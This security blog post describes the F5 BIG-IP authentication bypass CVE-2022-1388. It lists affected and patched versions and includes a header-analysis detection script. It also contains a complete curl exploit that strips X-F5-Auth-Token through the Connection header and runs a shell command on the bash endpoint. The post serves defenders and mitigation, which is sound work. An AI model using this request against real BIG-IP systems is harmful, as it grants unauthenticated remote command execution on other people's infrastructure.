F5 BIG-IP critical vulnerability exploited by attackers to gain unauthenticated RCE

Written by Aarush Ahuja
Co-founder @ FourCore

If you use F5 BIG-IP application services, you might be vulnerable to an unauthenticated RCE that attackers are actively exploiting. It is tracked as CVE-2022-1388 and has a CVSS score of 9.8 out of 10! The vulnerability is in the iControl REST interface of F5's BIG-IP solution, and threat actors can exploit it on F5 BIG-IP admin dashboards exposed to the internet. Attackers have already been seen exploiting the vulnerability in the wild!

Are you vulnerable to CVE-2022-1388?

The following versions of the F5 BIG-IP application services product are vulnerable:

  • 16.1.0 - 16.1.2
  • 15.1.0 - 15.1.5
  • 14.1.0 - 14.1.4
  • 13.1.0 - 13.1.4
  • 12.1.0 - 12.1.6
  • 11.6.1 - 11.6.5

The iControl REST service is a Java application exposed by an Apache web server acting as a reverse proxy. The vulnerability exists in the authentication flow between Apache and the iControl application. F5 uses a custom Apache authentication module that authenticates requests flowing into Apache: it verifies the presence of the X-F5-Auth-Token header and forwards the request to the iControl application if the header is present; otherwise the request is rejected.

If a request without the X-F5-Auth-Token header reaches the iControl REST application, the application takes an alternate route and fulfils the request without needing a token. The custom authentication module is what prevents an attacker's request without an X-F5-Auth-Token header from being passed to the iControl application.

However, in the authentication module, the check for X-F5-Auth-Token is done before the Connection header is processed. Apart from its usual function, the Connection header can also list headers that the proxy must remove before forwarding. A request can therefore list X-F5-Auth-Token in Connection, so that the header is removed before the request is sent to the iControl application. Because the basic token presence check is performed before the Connection header is processed, this bypasses the authentication module.
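An added example, not from the original article and not F5's code: this Python detection check parses a raw request head, compares what a header-presence check sees with what survives hop-by-hop removal, and alerts when a /mgmt/ request lists X-F5-Auth-Token in Connection. The sample requests, the host name bigip.example and all function names are constructed for illustration.

```python
# Added example (not F5 code): spot requests that ask the proxy to drop the auth token.
TOKEN = "x-f5-auth-token"

def parse_head(raw):
    """Parse a raw HTTP/1.1 request head into (path, [(lowercased name, value)])."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    path = lines[0].split(" ")[1]
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return path, headers

def nominated(headers):
    """Header names listed in Connection, i.e. marked hop-by-hop by the client."""
    return {t.strip().lower() for n, v in headers if n == "connection"
            for t in v.split(",") if t.strip()}

def analyze(raw):
    """Compare what a presence check sees with what is forwarded upstream."""
    path, headers = parse_head(raw)
    drop = nominated(headers)
    forwarded = {n for n, _ in headers if n not in drop}
    return {
        "token_at_check": any(n == TOKEN for n, _ in headers),
        "token_forwarded": TOKEN in forwarded,
        # Legitimate clients have no reason to mark the auth token hop-by-hop.
        "alert": path.startswith("/mgmt/") and TOKEN in drop,
    }

# Constructed sample requests; host and token values are placeholders.
NORMAL = ("POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: bigip.example\r\n"
          "Connection: keep-alive\r\nX-F5-Auth-Token: PLACEHOLDER\r\n\r\n")
STRIPPED = ("POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: bigip.example\r\n"
            "Connection: keep-alive, x-f5-AUTH-token\r\nX-F5-Auth-Token: 0\r\n\r\n")

if __name__ == "__main__":
    for label, raw in (("normal", NORMAL), ("stripped", STRIPPED)):
        print(label, analyze(raw))
```

The check needs a log or capture source that records request headers, since the signal is in the Connection header value rather than in the URL or status code.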

CVE-2022-1388 is trivial to exploit!

One can trivially craft a payload to execute arbitrary commands on a vulnerable system. The management API includes a convenient command execution endpoint, which becomes reachable because of the vulnerability.

$ curl -i -s -k -X $'POST' \
    -H $'Host: <redacted>:8443' \
    -H $'Authorization: Basic YWRtaW46' \
    -H $'Connection: keep-alive, X-F5-Auth-Token' \
    -H $'X-F5-Auth-Token: 0' \
    -H $'Content-Length: 52' \
    --data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a' \
    $'https://<redacted>:8443/mgmt/tm/util/bash' \
    --proxy http://127.0.0.1:8080

The vulnerability is being actively exploited by attackers in the wild, as reported by Palo Alto. Censys lists over 2500 BIG-IP instances potentially vulnerable to CVE-2022-1388.

Mitigate CVE-2022-1388

Patches for the vulnerability are available for F5 BIG-IP deployments. Patch your deployment to one of the following versions to mitigate CVE-2022-1388:

  • 17.0.0
  • 16.1.2.2
  • 15.1.5.1
  • 14.1.4.6
  • 13.1.5

If you are unable to upgrade yet, follow F5's official advisory for the mitigation steps to apply.
